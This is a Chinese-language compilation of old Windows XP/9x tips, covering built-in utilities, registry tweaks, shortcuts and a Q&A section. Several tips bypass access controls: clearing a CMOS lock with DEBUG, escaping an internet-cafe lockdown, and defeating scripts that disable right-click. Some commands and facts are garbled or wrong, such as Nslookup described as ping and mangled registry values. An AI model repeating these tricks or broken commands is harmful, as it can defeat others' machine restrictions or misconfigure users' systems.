2.辅助功能向导——Accwiz（system32文件夹下）
    我们知道，微软在Windows中为残疾人士提供了辅助功能，使他们也能xx作计算机。该程序可以根据用户的视觉、听力和行动来配置我们的Windows，使残疾人士能根据自身情况更好地使用Windows。

3.字符映射表——Charmap（system32文件夹）
    是不是觉得Word的“插入符号”功能非常方便？我们在其他Windows程序中也常常要插入一些特殊符号，而一个个地找又麻烦，这时可使用“字符映射表”程序帮忙。通过“字符映射表”可查看选定字体中有哪些字符，选中后单击“选定”和“复制”按钮，即可把选定字符复制到Windows剪贴板中，供字处理软件粘贴使用。
    小提示：用它来复制特殊字体中的特殊符号特别有用。

4.仓颉拼音输入法——CINTSETP(system32＼IME＼Cintlgnt文件夹下)
    微软新仓颉输入法98b的安装程序，微软把它放在简体中文版Windows XP中，但埋藏得较深。不过它很有用，安装后就会在Windows中新增一个“中文（台湾）”的仓颉输入法，利用它可以在简体中文Windows XP上通过输入繁体汉字。这对于从中国港澳台地区至内地工作的人提供了方便。

5.磁盘清理大师——Cleanmgr（system32文件夹下）
    尽管现在的硬盘越来越大，但它总有容量的限制。在你不经意地安装这个或那个软件的过程中，可能会因为硬盘空间已频频告急而影响了正常Windows程序的执行。不要急，请打开此程序，它会自动地释放出一部分硬盘空间，并会智能化地进行删除xx作，保证你的系统万无一失。这比从资源管理器中删除要安全多了。

6.剪贴板查看器——Clipbrd（system32文件夹下）
    Windows剪贴板为我们在各个Windows程序间的信息交流提供了一个桥梁。但这部分数据一般情况下无法看到。不过，使用剪贴板查看器就可看到当前剪贴板中的“新大陆”。Windows XP中的剪贴板查看器程序较原先Windows 9X/Me的旧版本多出了共享功能，通过设置权限允许其他网上用户将该剪贴板装入使用。

7.控制面板启动器——Control.exe（system32文件夹下）
    控制面板是Windows的一个重要组成部分，许多设置都通过他完成。而双击这个文件就是最快打开系统控制面板的方法，可省去从“开始”菜单上层层点击的麻烦。

8.Windows XP的诊断医生——Drwtsn32（system32文件夹下）
    Drwtsn32是一个程序错误调试器。DrWatson程序会获得并记录运行Windows的计算机上的程序错误的信息。只要检测到错误，就会创建一个文本文件 (Drwtsn32.log)，提供错误原因的详细说明，并给出解决问题的建议性xx作，在与Microsoft技术支持联系并请求帮助时，Drwatson将会起到很大作用。

9.DVD播放器——DVDplay（system32文件夹下）
    随着DVD驱动器和DVD光盘价格的下降，在普通家庭电脑上配置一个DVD播放器已不是一件奢侈的事情。而要播放DVD需要播放器的支持，Windows XP提供了一个“免费”的DVD播放器，有了它我们可以省去一笔购买第三方DVD播放软件的费用。

10.自解压文件制作工具——Iexpress（system32文件夹下）
    用过压缩软件的读者一定对自解压文件不陌生，自解压文件可在没有相应解压缩程序的情况下直接将压缩包文件解压缩到相应的文件夹下，极大地方便了用户。利用Iexpress可制作两种自解压文件，一种是标准自解压文件（Standard Self-Extractor），另一种是安装程序式自解压文件（Self-Extractor for Software Installation），这样我们在发布程序时就方便多了。另外大家要注意，尽管使用Iexpress的运行界面是英文的，但利用它生成的自解压文件却是中文的，省去了繁琐的本地化工作。

11.文件转移向导——Migwiz（system32＼usmt文件夹下）
    Windows系统的易用性总是和不稳定性共存的，因此在系统健康之时把当前设置保存下来，供系统崩溃后重新安装时使用是个不错的主意。微软已把这个工具集成到“文件和设置转移向导”程序上。通过它，我们就可以实现系统状态的备份与恢复。

12.系统配置程序——Msconfig（Windows＼PChealth＼HELPCTR＼Binaries文件夹下）
    和Windows中的系统配置程序一样，通过这个程序，我们可对系统的一般、SYSTEM.ini、WIN.ini、BOOT.ini、服务和启动项目进行修改。
小提示：用它来去除系统自启动程序特别有效。

13.备份工具——Ntbackup（system32文件夹下）
    数据是计算机中最为宝贵的资料，因此经常备份你的资料也应该成为一个好习惯。现在许多人都寻求第三方的备份工具，其实大可不必。使用Windows XP中内置的备份工具就可以非常方便地将资料进行备份，而且由于你使用的是微软产品，所以根本不存在兼容性问题。

14.ODBC数据源管理器——Odbcad32（system32文件夹下）

    在Windows中访问ODBC数据源必须要有其驱动程序，该工具可以查看在Windows中已安装的驱动程序及相关信息。

15.IP地址侦测器——Nslookup（system32文件夹下）
    在联入互联网的每台电脑都有一个IP地址，同样，每个网站也有它的IP地址，而且是唯一的。通过这个IP侦测工具ping就可以轻而易举地得到它们的真正IP地址。如笔者要想知道http://www.xxx.com的IP地址，...S窗口下输入ping http://www.xxx.com即可看到。

16.屏幕键盘——Osk（system32文件夹下）
    屏幕键盘是一种实用工具，它在屏幕上显示虚拟键盘，允许那些有移动障碍的用户用指针设备或游戏杆输入数据。屏幕键盘旨在为存在移动障碍的用户提供最低级别的功能。这对于不知道如何键入的用户也很有用。它还可以用于最基本的CAI键盘教学。

17.对象包装程序——Packager（system32文件夹下）
    通过对象包装程序我们可以打开一个文件，并引入其中的图标，将它们插入到一般Windows程序中使用，可用于制作计算机类教学课件或文档。

18.注册表编辑器增强版——Regedit32（system32文件夹下）
    注册表编辑器是用来更改系统注册表设置的高级工具。注册表中包含了有关计算机如何运行的信息。在Windows XP中有一个名为Regedit的程序，可编辑注册表，但此程序却是它的增强版本，除可编辑注册表外，还可设置权限、清除重复项、删除已被卸载或删除的程序项等高级xx作。

19.ActiveX注册和反注册工具——Regsvr32
    使用过ActiveX的人都知道，ActiveX不注册是不能够被系统识别和使用的，一般安装程序都会自动地把它所使用的ActiveX控件注册，但如果你拿到的一个控件需要手动注册怎么办呢？如果修改注册表那就太麻烦了，在Windows的System文件夹下有一个regsvr32.exe的程序，它就是Windows自带的ActiveX注册和反注册工具。它的用法为：
    “regsvr32 [/s] [/n] [/i(:cmdline)] dllname”。其中dllname为ActiveX控件文件名，建议在安装前拷贝到System文件夹下。
    参数有如下意义：
    /u——反注册控件
    /s——不管注册成功与否，均不显示提示框
    /c——控制台输出
    /i——跳过控件的选项进行安装（与注册不同）
    /n——不注册控件，此选项必须与/i选项一起使用
    如笔者要注册一amovie.ocx控件，则打入regsvr32 amovie.ocx即可，要反注册它时只需使用
regsvr32 /u amovie.ocx就行了。

20.动态链接库函数启动器——Rundll32
    在Windows中使用了许多动态链接库，这样就使得所有Windows程序都可共享这些动态链接库中的函数。一般情况下，许多应用程序都通过Windows API来xx作这些函数，但归根结底是通过Windows文件夹下的rundll32.exe程序来启动相应的函数。它的用法是：“rundll32.exe 动态链接库名,函数名,参数名”。如笔者需要实现一键关机，则在桌面上建立一快捷方式，命令行为“rundll32.exe user.exe,ExitWindows”，并设置其快捷键为F4即可。再如，笔者要打开控制面板，则只需要输入命令“rundll32.exe shell32.dll,Control_RunDLL”即可，要打开桌面属性，只需要使用“rundll32.exe shell32.dll,Control_RunDLL desk.cpl”，其余的以此类推。

21.系统文件检查器——Sfc（system32文件夹下）
    使用Windows难免不会出现系统文件损坏或丢失的毛病，而如果为了几个小小的文件就去重装系统，又显得稍微麻烦了一些。通过系统文件检查器Sfc.exe，一切都会变得非常简单。

22.共享文件夹设置工具——Shrpubw（system32文件夹下）
    同一工作组的同事在一起工作，有时必须与同事们共享文件夹，这时我们可以利用此工具轻松搞定。它的作用与右击一文件夹，选择“共享”基本上等价。

23.Microsoft 签字验证工具——Sigverif（system32文件夹下）
    所谓“签署的文件”，就是被授予Microsoft数字签署的文件。该签署表明，该文件是原始文件的一模一样的副本。通过Microsoft签字验证工具，我们可在计算机上查找已签署和未签署的文件，也可查看签署文件的身份验证，以确认该文件还没有被篡改。使用起来非常方便，和查找窗口几乎没有什么不同，只要给出搜索范围，就可搜索出指定范围内的已签署文件和未签署文件。

24.音量控制程序——Sndvol32
    我们在Windows任务栏上可见到一个可爱的小喇叭，当我们双击它时就会弹出音量控制面板，其实这时我们就是启动了一个Windows文件夹下的sndvol32.exe文件。不信，请你进入Windows文件夹，再打开sndvol32.exe文件看看，熟悉的“音量控制”面板是否已经在你眼前了？另外还要告诉大家，它还有一个隐藏的参数“/r”，利用此参数可快速地打开录音控制面板，这样我们只要在桌面上建立一指向C:＼Windows＼Sndvol32.exe的快捷方式，并令它的参数为/R（即在目标中填入“C:＼Windows＼Sndvol32.exe /R”），就可以快速打开录音控制面板选择输入设备了。如果设备过多，在面板上容纳不下时，试着按“Ctrl+S”键，不管有多少设备都能够完全显示。

25.任务管理器——Taskmgr（system32文件夹下）
    任务管理器提供正在你的计算机上运行的程序和进程的相关信息，使用任务管理器可快速查看正在运行的程序的状态，或终止已停止响应的程序。也可使用多达15个的参数评估正在运行的进程的活动，以及查看CPU和内存使用情况的图形和数据。当计算机发生锁死时使用它最方便和有效。

26.远程连接程序——Telnet（system32文件夹下）
    在Internet上有无数的计算机，而要访问它们都必须通过建立远程连接才行，进行两个计算机的远程连接可用专门软件实现，但通过Windows自带的远程连接程序telnet.exe也能完成这一xx作，而且它还是纯中文界面软件。

27.远程FTP工具——Tftp（system32文件夹下）
    FTP是一个网络传输的协议，通过这个程序可非常方便地连接到对方的服务器上进行文件的存取xx作，省得再找如第三方的FTP软件了，可惜的是它是字符界面。

28.Windows升级程序——Wupdmgr（system32文件夹下）
    安装完Windows后，在开始菜单的上方会有Windows Update菜单项，通过它能自动登录到Microsoft公司的网站上完成自己Windows的升级工作。但时间一长，可能会把这个快捷方式误删除了，这时我们就可以通过打开Windows下的Wupdmgr.exe文件来完成这个功能。

    Windows XP是一个操作系统，但它并不仅仅是一个操作系统，只有充分地发挥其内置功能，才能更好地使用它。这也符合“基础的未必是最坏的，回到基础还是好的”的道理。

XP提升性能小技巧

一、取消解压缩功能
Windows XP可以自己解开Zip压缩文件，但你是不是更钟爱Winzip、WinRAR呢﹖那就把Windows XP默认的解压缩功能取消吧!按下“开始”→“运行”，输入“regsvr32 /u zipfldr.dll”，然后确定。接下来会弹出一个窗口，按确定，这样Windows XP的解压缩功能就被取消了。

二、去掉磁盘扫描的等待时间
当Windows XP非正常关机时，重新开机需要等待10秒才会开始磁盘扫描。如果你觉得这10秒钟太长，那就干脆让它变成0秒吧!按下“开始”→“所有程序”→“附件”→“命令提示符”，在提示符下键入“CHKNTFS /T0”然后回车，这样下次就不用等待那漫长的10秒了。

三、加快下载速度
Windows XP在默认情况下，保留了20%的连接带宽给支持QoS的程序，但是，大部分程序都不支持QoS服务，也不是所有的设备都提供QoS封包分流管理。因此，释放这预留的20%的带宽，可以使下载速度提高不少。按下“开始”→“运行”，输入“gpedit.msc”，弹出组策略窗口，在窗口的左边依次点选“计算机配置”→“管理模块”→“网络”→“QoS数据包调度程序”，在右边的“限制可保留带宽”上点右键，选择属性，在弹出窗口的“设置”选项卡下选“已启用”，将“带宽限制”改为0%。

四、释放系统备份所占用的空间
Windows XP在安装完毕后会自动备份一些重要的系统文件，如果你想把这些空间腾出来，那好，按下“开始”→“运行”，输入“sfc /purgecache” ，然后确定，稍等片刻，你会发现硬盘空间又多出不少!

五、删除预读文件以提升系统效能
Windows XP有个专门储存安装过的软件的预读文件的文件夹，以便预先读取以加快软件运行速度，但Windows XP并不会自动将已卸载软件的预读文件删除，所以只有手动来删除了。进入“XWindowsPrefetch”（X表示Windows XP所在的分区）文件夹，删除除了“Layout.ini”以外的
所有文件。

六、全方位地了解你的计算机
想不想全面地了解你的计算机的软硬件信息和使用状况呢?Windows XP已经带有强大的系统信息收集程序。按下“开始”→“帮助和支持”，弹出“帮助和支持中心”窗口，在右边选择“使用工具查看您的计算机信息并分析问题”，然后在左边的列表中选择“我的计算机信息”，好了，你可以在右边选择你想知道的信息了（比用Msinfo32.exe得到的系统信息要直观得多! 。

七、瞬间锁定计算机

突然有事要离开片刻，但又不想关机，为了不让别人动你的电脑，你只需要按下Windows徽标键+L，即可快速锁定计算机，除非知道密码，谁也别想动!

八、修改cpu的二级缓存

在正常情况下，xp会自动识别cpu的二级缓存。但有时xp不会这样做，这样就需要手动优化以改善cpu的性能。
1.运行"regedit";

2.去"[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory
Management\SecondLevelDataCache]";

3. 修改他的十进制: 　　AMD Duron: 64(kb); 　　CeleronA/celeron2:128; 　　PII mobile/
PIII E(EB)/P4/AMD K6-3/AMD THUNDERBird/Cyrix III:256; 　　AMD K6-2/PII/PIII katmai/
AMD Athlon:512; 　　PII Xeon/PIII Xeon:1024;

4.重启。

九、修改磁盘缓存以加速xp

磁盘缓存对xp运行起着至关重要的作用，但是默认的I/O页面文件比较保守。所以，对于不同的内存，采用不同的磁盘缓存是比较好的做法。
1.运行 "regedit";
2.去[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\IoPageLockLimit];
3.根据你的内存修改其十六进制值: 　　64M: 1000; 　　128M: 4000; 　　256M: 10000; 512M或更大: 40000

4.重启

十、预读设置以提高速度

xp使用预读设置这一新技术，以提高系统速度。如果你拥有PIII 800, 512M内存以上，推荐一下修改：
  1.运行“egedit”
2.去[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters\EnablePrefetcher];
3.设置数值0，1，2，3。0-Disable,1-预读应用程序,2-启动预读,3-前两者皆预读 ("3"，推荐
使用)。
4.重启。这样可以减少启动时间。

十一、清除预读文件

当xp使用一段时间后，预读文件夹里的文件会变的很大，里面会有死链文件，这会减慢系统时间。建议，定期删除这些文件。（c:\windows\prefetch）

十二、减少磁盘扫描等待时间
    在dos下，键入“chkntfs/t:0” 　　0：表示等待时间为0秒

十三、关闭磁盘索引
   Xp纪录了所有文件以便快速搜索，如果你不经常查找文件，可将它关闭。
1.打开我的电脑
2.右击驱动器，选“属性”。
3.取消“使用索引以便快速查找文件”。

十四、修正鼠标加速的bug
1.当在xp玩quake3、cs时，鼠标加速有问题而且枪法变得不准，名为“yinxs”的tweak能修改这个bug。
2.运行“regedit”
3.去[HKEY_CURRENT_USER\Control Panel\Mouse] "SmoothMouseXCurve"=hex:00,00,00,00,00,00,00,00,00,a0,00,00,00,00,00,00,00,40

,\ 01,00,00,00,00,00,00,80,02,00,00,00,00,00,00,00,05,00,00,00,00,00 "SmoothMouseYCurve"=hex:00,00,00,00,00,00,00,00,66,a6,02,

00,00,00,00,00,cd,4c,\ 05,00,00,00,00,00,a0,99,0a,00,00,00,00,00,38,33,15,00,00,00,00,00
4.重启

十五、优化ntfs文件系统
ntfs的好处不用说了吧，但也有不足。取消更新最后一次磁盘访问，这样对于容量大的分区，会减慢速度。
   运行“regedit” 在HKEY_LOCAL_MACHINE\SYSTEM\CurrentContolSet\Control\Filesystem)中，加DWORD，数值为1。

Windows实用操作技巧

1.如果同时有多个窗口打开，想要关闭的话，可以按住shift不放然后点击窗口右上角的关闭图标

2.在保存网页前，可以按一下"ESC"键(或脱机工作)再保存,这样保存很快

3.用电脑听CD可以不用任何播放软件，把音箱线直接接到光驱的耳机孔，放入CD，按光驱上的play键就可以直接听了，这样听歌可以不占用系统资源。（如果你的电脑坏了，不能启动或什么的，一时放在那不能修，千万不要浪费资源，把用里面的电源给光驱通上电，就可以暂时做CD机了

3.MSN中发消息的时候是按enter的，如果想要换行而不想发出消息，可以shift+enter或ctrl+enter

4.浏览器的地址栏里可以调试简短的HTML代码。方法如下： 地址栏写about:<font color="#0000ff">abc</font> 回车，就看到效果了

5.Windows快捷键：
win+m 显示桌面
win+pause 系统属性
快速重新启动:按确定前先按shift.
彻底删除:shift+del
不让光盘自动运行:按shift
Ctrl+Esc：相当于"开始"或WIN键
Ctrl+Home：将游标移至文字编辑区的开始始(Home单用：移至列首)
Ctrl+End：将光标移至文字编辑区的终点(End单用：移至列尾)
Alt+F4：关闭当前视窗（若是点一下桌面再按则为关机)
F2：更改名称
windows+e 资源管理器
windows+r 运行
windows+f 查找
windows+u 关闭系统
windows+d最小化所有窗口，再按一次Win+D可回到最小化前的窗口
windows+m最小化所有窗口，但再按一次无法回到最小化前的窗口
Shift+F10，可以打开所选项目的右键菜单
按住 CTRL+SHIFT 拖动文件:创建快捷方式

6.<关机快捷方式>
(1). 在桌面空白位置按鼠标右键 -> <新建> -> 选<快捷方式>
(2). 在<指令行>键入 rundll.exe user.exe,exitwindows
(3). 在<选择快捷方式 的名称>键入<关闭Window>或你想要的名称 -> 按<完成>
7.<重新启动快捷方式>
(1). 重复以上 (1)
(2). 在<指令行>键入 rundll.exe user.exe,exitwindow***ec
(3). 在<选择快捷方式的名称>键入<重新启动Restart>或你想要的名称 -> 按<完成>
8.RUN - > cmd 或者command
就会看到DOS窗口。不知道大家注意到那个小小的图标没有，在左上角。点击这个图标， 就会看到下拉菜单， 尤其是Edit下的一些功能， 很方便
10.con、nul是MS系统的保留名，它不能做为文件名！检查你的web空间是不是M$系统，可以建一个con的文件夹试试
11.想把自己的某个文件夹的文件做一个列表? 用什么软件呢? 不用,直接在命令行下输入 "tree /f > index.txt".打开index.txt看一下是不是一目了然
12.保存无边窗口页面请用CTRL+N新开窗口
13.如果一个文件夹下有很多文件，如果想快速找到想要的文件，先随便选择一个文件，然后在键盘上选择想要的文件的第一个字母就可以了
14.说个QQ隐身登陆的笨办法:
在网吧上网，如果直接从注册向导登陆的话QQ是上线登陆的，可是有时候却不希望现身，怎样实现隐身登陆呢？就是拿一个没用的QQ先从注册向导登陆了，选择状态为隐身，然后在系统参数中选中以隐身方式登陆，点确定，然后直接在这个QQ上运行注册向导登陆你要登陆的QQ，你会发
现现在QQ是隐身的了。
15.win98改ip不重启的办法：
1。改完ip选择取消。
2。在设备管理器里禁用改了ip的那块网卡。
3。启用网卡。
ok，你改的ip已经可以用了
16.2000和xp下运行"cmd"，进入dos窗口，复制和粘贴都用右键完成
17.收藏夹不要放在系统盘，以免忘了备份，每次装完系统用"超级魔法兔子“指定路径
18.对于系统不明白的地方，平时多看windows自带的帮助，不要盲目去找人解决，也许帮助才是最快和最全的。（其余软件也是同理）
19.winxp自带批量重命名功能，只要选中一堆文件，选重命名，然后改第一个文件，改完后，其他文件也会自动修改
20.上网时在地址栏内输入网址，系统会记录下来，虽然方便以后不用再重复，不过如果是公用的机子，又不想让别人知道自己到过哪些地方，可以用“CTRL＋O（字母O，不是0）”，这时对弹出一个“打开”对话框，在其中的地址栏内输入网址，就不会被记录下来了
21.IE快捷键：
Ctrl+W关闭窗口
F4打开地址拦的下拉选择网址
F6或ALT+D选择地址拦
空格键可以下翻页，Shift+空格则可以上翻页
22.如果你用foxmail，邮箱路径不在默认位置，可以修改account.cfg
23.NTFS分区上文件属性中有个“摘要”功能，很有用的，这样一些软件安装程序是什么东东就不会忘了啊
24.在IE的地址栏输入： javescript:alert(document.lastModified)可以得到网页的更新日期
25.通过网络共享时，尽量使用"运行"，\\ip地址\共享文件名，而不要使用通过“网上邻居”浏览访问，速度很慢，而且经常不全（特别是2000，xp)，还要注意适当的运用$
26.在98下快速做启动盘，只要把windows/command/edb下的所有文件复制到干净的软盘中就可以做98启动盘
27.运行pq分区失败，出现不可识别的分区，只要找到pq安装目录UTILITY的PTEDIT32.EXE，可以把原分区还原为原来格式打开资源管理器，选中文件夹，用小键盘的*,可以把这个文件夹中的所存在的所有子文件夹迅速列出
28.QQ自己加自己的方法：在黑名单中加自己，然后再把自己拖到我的好友中就可以了,然后再运行注册向导
29.如果浏览的页面中应用了javascript禁用了鼠标右键，解决的方法：
1、如“xiayupei”的方法，先按住鼠标左键，然后将鼠标移动到目标处，点击鼠标右键，一两秒之后，快捷菜单出现
2、单击鼠标右键，（不要放开鼠标右键），将鼠标移到警告窗口处，点击鼠标左键，关闭窗口，再将鼠标移回目标处，放开鼠标右键，快捷菜单出现
30.realplay多曲播放
选中多个曲目,然后拖到realplay 的播放地址栏就可以了,之后找到那个ram(会自动生成),复制里面的内容多遍就可以反复听歌曲
31.windows下文件可以只有扩展名
新建一个文本文档另存为.txt.前面什么也不要加，就可以了，但是你不能重命名为这样的文件名！要用另存为！
32.IE真正的空白页：
在IE的快捷方式中右击---属性--选择“目标”，这里的信息为：“c:\Program FilesInterner Explorer\EXPLORER.exe",在它之后添加“ -nohome"字样即可。注意-nohome之前要有空格
快速设置主页：将IE地址栏里的“e”网页图标直接拖到工具栏上的“主页”按钮图标上用重启也刷新注册表：同时按Ctrl+Alt+Del,在弹出的Windows任务列表中加亮"Explore",单击“结束任务”，显示关机屏幕，单击：“否“，稍候，弹出错误信息，单击“结束任务”，windows游览器即会和新和注册表一起重新装载
33.快速启动RealOnePlayer的技巧：在Real的文件夹下搜索netid.smi和getmedia.ini将其改名为：betid_bak.smi和getmedia_bak.ini，然后再打开试试,是不是快很多
34.跳过开机画面，启动时按 esc 即可，或者干脆一点，修改 msdos.sys在options段落加入logo=0
35.创建浏览目录的快捷方式
在桌面上创建一个快捷方式， 命令为：C: \WINDOWS\EXPLORER.EXE /n,/e,C:\当你双击此快捷方式时，将会用“Windows资源管理器”浏览C:\。当然，你可以用其他的目录名来替换命令中的C:\
36.改变关机画面:
记得以前可以改变开机画面吧　现在可以对关机画面动手喔　logow.sys 是等待关机logos.sys 是最後丑丑的 "您可以安全关机都是 bmp 档快动手吧原图是 320x400 , 256 色但是最後win95 会把他放宽 170%　所以你可以先准备一张 544x400 的图再把这张图 resize 成320x400　再 rename 一下档名就可以啦　（只能 256色喔　）而且最好注意一下色盘的问题*开机画面也可以喔　logo.sys....
37.这个 .exe 用了哪些 .dll?　对应用程式右键单击　选 "快速检视"笔者注快速检视必须另行安装,方法如下:a. 控制台/新增或移除程式/ Win95 安装程式 /附属应用程式/详细资料b. 核取"快速检视"方块　确定
38.厌倦图形介面了吗　想念以前先进入 dos 在打 win 进窗户吗在 msdos.sys 中加入这一行BootGUI=0
39.在 win95的MS-DOS下使用长文件名
只需要在文件名前后加引号（""）即可。如：
c:\>dir "windows utilities"
c:\>cd "windows utilities"\insteasy
c:\>edit "The list of my friends.txt"
40.加快软驱传输速度
    往软盘上存贮较多资料时，让人等得真有点烦。我们不可能对软驱的机械结构进行改造，但可以通过修改系统注册表以获得较高的数据传输速度，具体方法如下：打开系统注册表编辑器，找到“HEKY-LOCAL-MACHINE\System\CurrentControlset\Services\Class\FCD\000"，在其右边的
窗口空白处，占击鼠标的右健新建一个“DWORD”值，命名为 “Fore-Fifo”，健值设定为“0”。 最后关闭注册表面化编辑器，重新启动电脑，一切就OK了！
41.MSN背景修改：
是不是觉得MSN的背景很单调呢？那么很简单，找到你喜欢的图片，估计好大小，最好是选择背景是透明的。命名为lvback.gif，找到目录C:\Program Files\Messenger，将原来图片覆盖就OK了
42.启动Winamp，并播放一首MP3
2.然后按住[SHIFT]不放，再单击面板上的“停止”按钮
3.你会发现音乐没有立即停止，而是逐渐降低音量直至完全消失，就象电台DJ做的一样
43.
1.启动QuickTime Movie Player，并打开一个mov文件
2.当它播放的时候，点击暂停按钮，然后按下[Shift]键，并双击播映窗口
3.电影开始倒放了，声音也是倒放的
44.在98下文件夹共享时，在共享名后面加个$可以把共享文件夹隐藏
45.Shift的另一个用法：
①大家经常使用Tab键、Spase键，但不知各位注意过没有，以上转换键都是顺向的，但你按住Shift不放，再用上述按键时，他的转换方向是不是倒过来了？
②在英文输入时，如果在小写状态下，按住Shift同时输入的字母为大写，反之亦然；
46.智能ABC输入法中字母 “v”的用法：
①、在智能ABC输入中，V + 数字（1～9），可以输入各种字符、图形、数字等，一试便知，奇妙无穷，但我想大多数人早都用了吧？
②、在智能ABC输入中，在输入拼音的过程中（“标准”或“双打”方式下），如果需要输入英文，可以不必切换到英文方式。键入“v”作为标志符，后面跟随要输入的英文，按空格键即可。
47.在以Word为代表的Office系列中，图形、文本框等非字符元素的位置的微调： 以Word为例，在页面中插入图形或文本框等非字符元素，在页面排版时，经常为Word固有的所进所干扰，无法达到如意的效果。在使用中，笔者摸索出以下经验，与大家分享：
①、在调整某一图片（或其他元素，以下全以图片为代）的位置时，使用鼠标或方向键将其移动到大致位置时，按住Ctrl键，再用方向键移动，你会发现现在图片每次移动的间距比原来要小得多了，在Word要求的精度下应当完全达到您的要求了。
②、在调整某一图片（或其他元素，以下全以图片为代）的大小时，不使用鼠标时，图片变化的大小不连续，按住Alt键，再调节，现在其大小就可以任意调节了
48.大伙有没有碰过电脑黑屏一现象呀？按ESC以后，桌面上是否还留有许多黑色的影子呢？特别是下面的任务栏……不用鼠标找，就黑成一条了…………可以按“开始”——“关闭计算机”——“取消”，既可恢复49.2000或者Xp下硬盘默认是共享的，即使你关闭共享，下次启动后还是会共享。想要让域内的工作站不盗窃你的个人工作成果，尝试一下建立一个批处理文件，并放在all users的startup里（或者建一个快捷方式放在里面也可以）。内容如下：
net share c$ /delete
net share d$ /delete
net share e$ /delete
50.去除Windows 2000的默认共享
修改注册表：对于各server版：在注册表编辑器（regedit.exe）中依次找到“HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters”，之后在其下新建一个“双字节值”，取名为“AutoShareServer”的，并将其值设为“0”。之后重新启动服务器即可。对于professional版：同上面一样 只是将AutoShareServer改为AutoShareWks
51.双击任务栏上的喇叭，如果觉得弹出音量控制面板占用桌面太打，或不能完全显示，按Ctrl+S后就会以mini方式显示，想恢复再按一次Ctrl+S就OK
52.有时会遇到引导型病毒或是光驱找不到的情况，一般在dos下执行fdisk /mbr重启就可以解决
53.在windows目录下有一个sendto文件夹
你可以把记事本的快捷方式放到里边去，然后在希望用记事本打开的文件上右键发送到中选这个记事本即可，也可以建立相应文件夹的快捷方式,比如music指向放音乐的文件夹
54.如何下载网页上的FLASH？
1 用FLASHGET的资源探索就能下载网页上的FLASH
2 到WINDOWS/Temporary Internet Files也能找到你要的FLSAH
3 用缓存拾贝这个小软件也能拿你要的FLASH
55.解决COMS锁住问题
在DOS命令行下打DEBUG
-O 70 2F
-O 71 2F
-Q
56.有时候按默认路径安装一个软件，安装时由于没有在意，事后不知安装在哪，可以通过搜索（用当日时间），时间值最大的即为新装的文件，可以看出其所在的路径
57.我们单位工作已经离不开电脑（各部门间电脑已连成网），大多数职工还不会使用电子信箱，领导要求用网络资源发放通知等。在这种情况下，笔者使用如下方法（简单，易行，不花分文）：
1.在任何一台电脑（作为邮件服务器）建立一个共享文件夹（只读），文件夹命名为“XX”（信箱含义）。
2.在其他电脑的桌面建立一个快捷键（做好影射网络资源，指向作为邮件服务器的共享文件夹），快捷键命名为“公众信箱”
3.将所有的“word”文件（通知），放在该文件夹内。
4.用户只要点击该快捷键，便可看到所有的通知了
58.ping x.x.x.x 太快!改称 ping x.x.x.x -t
59.在网吧上网被美萍锁住：在ie地址兰里输入"桌面"有50%机会打开我的电脑，利用一些东西比如文件->打开可以进行磁盘操作了
60.用笔记本与投影仪搭配使用时有三种显示模式
1.笔记本屏幕有显示、投影仪不显示；
2.笔记本屏幕、投影仪均有显示；
3.投影仪有显示、笔记本屏幕无显示.
切换方法为按 Fn 键加F3（康柏的机子是这样的，也就是加上那个上面有个小显示器图标的键啦）

XP问答
[我使用Windows XP系统，请问使用什么方法可以提高启动速度？]

    使用微软提供的“Bootvis”软件可以有效的提高Windows XP启动速度。这个工具是微软内部提供的，专门用于提升Windows XP启动速度。下载后解压缩到一个文件夹下，并在“Options”项中设置使用当前路径。之后从“Trace”项下拉菜单中选择跟踪方式。该程序会引导Windows XP重新启动，并记录启动进程，生成相关的BIN文件。之后从Bootvis中调用这个文件，从Trace项下拉菜单中选择“Optimize system”命令即可。

  [我使用Windows XP时发现，随着不断地增加、删除应用程序，磁盘可用空间不断减少，这是为什么？]

    从Windows 2000开始，Windows会在每个硬盘分区中建立一个“System Volume Information”文件夹，在该文件夹中提供的是系统默认保存的系统还原备份文件。不过Windows 2000还没有正式提供系统还原功能，在XP中，你可以看到相关的选项。为防止这个问题发生，最简单的方法就是关闭“系统还原”功能。如果要删除这个文件夹中保存的文件，你需要以Administrator（管理员）身份登录系统。

[信使服务 是WINDOWS NT/2000/XP 操作系统中自带的一个信息服务程序。用户在安装操作系统时。这个服务程序默认是打开的。]

关闭方法
1：安装PC防火墙（如天网个人防火墙，并将安全级别设为高）。
2：关闭该项服务的具体操作如下：在NT/2000/XP 操作系统的控制面板-管理工具-服务，将 alerter,messager 服务关掉即可 或进入DOS界面，输入net stop msg 和 net stop alerter 命令

[如何提高Windows XP的运行速度？]

    Windows XP虽然提供了一个非常好的界面外观，但是不可否认这样的设置也在极大程度上影响了系统的运行速度。如果你的机器运行起来速度不是很快，建议将所有的附加桌面设置取消，也就是将Windows XP的桌面恢复到Windows 2000样式。设置的方法非常简单，在“我的电脑”上单击鼠标右键，选择“属性”，在“高级”选项卡中单击“性能”项中的“设置”按钮，在关联界面中选择“调整为最佳性能”复选框即可。此外，一个对Windows XP影响重大的硬件就是内存。使用256MB内存运行Windows XP会比较流畅，512MB的内存可以让系统运行得很好。

    [我在Windows XP中设置了用户存取磁盘权限，但是后来由于不慎将用户删除，现在不能查看被加密的磁盘和文件了，怎么办？]

    Windows XP具有更高的安全性能，如果设置用户的时候使用了权限保护功能，其他用户是不能直接访问你的文件夹的，即使是系统管理员都不行。这样虽然安全，但是出了问题也是非常头痛的事情。如果你正好遇到这样的问题，必须以Administrator身份登录，然后在文件夹选项中的“View（查看）”选项卡中的“Advanced Settings（高级设置）”列表窗口中关闭“Use simple file sharing（使用简单文件共享）”复选框。之后返回相应的文件夹或者磁盘分区，在关联的菜单中选择“Properties（属性）”命令，切换到“Security（安全）”选项卡，此时可以看到其中没有允许访问的任何用户，单击“Advanced（高级）”按钮，进入高级设置界面。切换到“Owner（所有者）”选项卡，在其中如果有你的用户列表，选择它，并选择界面下边的 “Replace owner on subcontainers and objects（替换子容器及对象的所有者）”复选框，单击“Apply（应用）”添加设置，此时你可以看到在“Permissions（权限）”选项卡中看到你的名字了。当然，如果在“Permissions（权限）”
